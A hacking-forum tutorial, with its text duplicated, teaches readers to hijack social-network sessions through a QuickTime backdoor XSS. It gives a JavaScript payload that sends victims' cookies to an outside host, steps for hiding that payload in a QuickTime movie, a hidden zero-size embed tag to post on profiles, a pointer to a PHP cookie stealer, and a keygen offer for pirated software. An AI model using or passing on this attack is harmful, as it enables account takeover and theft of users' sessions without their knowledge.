Main:advertisement
Session Hijacking using a Crafted Quicktime Backdoor XSS, that allows attackers to execute arbitrary Javascript.
Requirements:
- Knowledge of HTML
- Quicktime Pro
- Cookie editor
- Cookie Stealer
- Hosting
I will first introduce some security issues of many social network sites. Well Social network sites such as Tagworld, Myspace, and Friendster allow their users to use html tags. This is very dangerous, because it allows victims to escape html rules to execute dangerous code. This includes javascript, which is very dynamic and used for many situations of sessions Hijacking and phishing. Many Social Network today are under attack by hackers to due to failure of security measures. This includes Myspace and TagWorld. A Common exploit that has been used against them are flash redirects which were used in association of Actionscript which caused embeded flash files to redirect the user without any interaction using the getURL() method in Actionscript. Now that they have fixed that, attacks are becoming more complex. An example of this is the QuickTime backdoor XSS, discovered by GNUCITIZEN, is being used to hijack many profiles in social networking sites.
This tutorial will show how to craft a QuickTime exploit and use it to hijack sessions.
How to Create the Quicktime Exploit:
I am assuming you have Quicktime Pro, so we go on. Now you first create a textfile and in it include javascript code, and surround the code in tags. Then you add parameters before and after the code to allow the exploit to run automatically.
An (totally random) example would be:
A<javascript:window.location=http://myspace12.php0h.com/cookie.php?c=+escape(document.cookie);> T<>
The prefix A defines that the action will be automatic - no user interaction is required. There is also T flag, which specifies the target for the action. In this case it is null.
Now, save the textfile and name it whatever you want. Then open up Quicktime Pro, click file --> Open File. Select All files, and open up the text file we have made. This then prints the text onto a black background on the movie. Now go to Window --> Movie Properties, uncheck Text Track. After that rename Text Track to HREFTrack. As soon as your done, save the movie, and name it whatever you would like.
Now to obtain a Cookie Stealer. Hmm, well you could code it yourself, or if your a non php coder then you can use System_Meltdown's PHP cookie stealer. You can get it at http://www.hellboundhackers.org/readcode.php?id=16 .
Now to include the quicktime movie (Aka. Backdoored XSS), we use HTML's embed tag.
For Example:
<embed type=video/quicktime allowscriptaccess=never allownetworking=internal enablejsurl=false enablehref=false saveembedtags=true src=http://Your_host_here/Your_movie_here.mov height=0 width=0>
Just post the code in a comment, or bulletin in any social networking site, and voila, you should be recieving some cookie in the ouput file of the PHP cookie stealer script which is cookies.htm. As soon as you've obtained your victim's cookie, you must look for the MYUSERINFO part of cookie. This data holds the session of the User.
NOTE: Only people who have Quicktime installed, is vulnerable to this exploit (Not to worry because almost everyone does.).
If you want a visual view of the Tutorial, download my video!! http://www.megaupload.com/?d=4WSSCJQ8 It includes a keygen for Quicktime Pro, This , So you dont have to try to find one.. Consider it as a gift. :D
Well time to give out the credits. Greets for Matthewtheexploit to finding the exploit in Myspace and Gnucitizen for crafting and spending the time to find and make the exploit.
Have Fun!
-Insidious
- Knowledge of HTML
- Quicktime Pro
- Cookie editor
- Cookie Stealer
- Hosting
I will first introduce some security issues of many social network sites. Well Social network sites such as Tagworld, Myspace, and Friendster allow their users to use html tags. This is very dangerous, because it allows victims to escape html rules to execute dangerous code. This includes javascript, which is very dynamic and used for many situations of sessions Hijacking and phishing. Many Social Network today are under attack by hackers to due to failure of security measures. This includes Myspace and TagWorld. A Common exploit that has been used against them are flash redirects which were used in association of Actionscript which caused embeded flash files to redirect the user without any interaction using the getURL() method in Actionscript. Now that they have fixed that, attacks are becoming more complex. An example of this is the QuickTime backdoor XSS, discovered by GNUCITIZEN, is being used to hijack many profiles in social networking sites.
This tutorial will show how to craft a QuickTime exploit and use it to hijack sessions.
How to Create the Quicktime Exploit:
I am assuming you have Quicktime Pro, so we go on. Now you first create a textfile and in it include javascript code, and surround the code in tags. Then you add parameters before and after the code to allow the exploit to run automatically.
An (totally random) example would be:
A<javascript:window.location=http://myspace12.php0h.com/cookie.php?c=+escape(document.cookie);> T<>
The prefix A defines that the action will be automatic - no user interaction is required. There is also T flag, which specifies the target for the action. In this case it is null.
Now, save the textfile and name it whatever you want. Then open up Quicktime Pro, click file --> Open File. Select All files, and open up the text file we have made. This then prints the text onto a black background on the movie. Now go to Window --> Movie Properties, uncheck Text Track. After that rename Text Track to HREFTrack. As soon as your done, save the movie, and name it whatever you would like.
Now to obtain a Cookie Stealer. Hmm, well you could code it yourself, or if your a non php coder then you can use System_Meltdown's PHP cookie stealer. You can get it at http://www.hellboundhackers.org/readcode.php?id=16 .
Now to include the quicktime movie (Aka. Backdoored XSS), we use HTML's embed tag.
For Example:
<embed type=video/quicktime allowscriptaccess=never allownetworking=internal enablejsurl=false enablehref=false saveembedtags=true src=http://Your_host_here/Your_movie_here.mov height=0 width=0>
Just post the code in a comment, or bulletin in any social networking site, and voila, you should be recieving some cookie in the ouput file of the PHP cookie stealer script which is cookies.htm. As soon as you've obtained your victim's cookie, you must look for the MYUSERINFO part of cookie. This data holds the session of the User.
NOTE: Only people who have Quicktime installed, is vulnerable to this exploit (Not to worry because almost everyone does.).
If you want a visual view of the Tutorial, download my video!! http://www.megaupload.com/?d=4WSSCJQ8 It includes a keygen for Quicktime Pro, This , So you dont have to try to find one.. Consider it as a gift. :D
Well time to give out the credits. Greets for Matthewtheexploit to finding the exploit in Myspace and Gnucitizen for crafting and spending the time to find and make the exploit.
Have Fun!
-Insidious
Posted by 
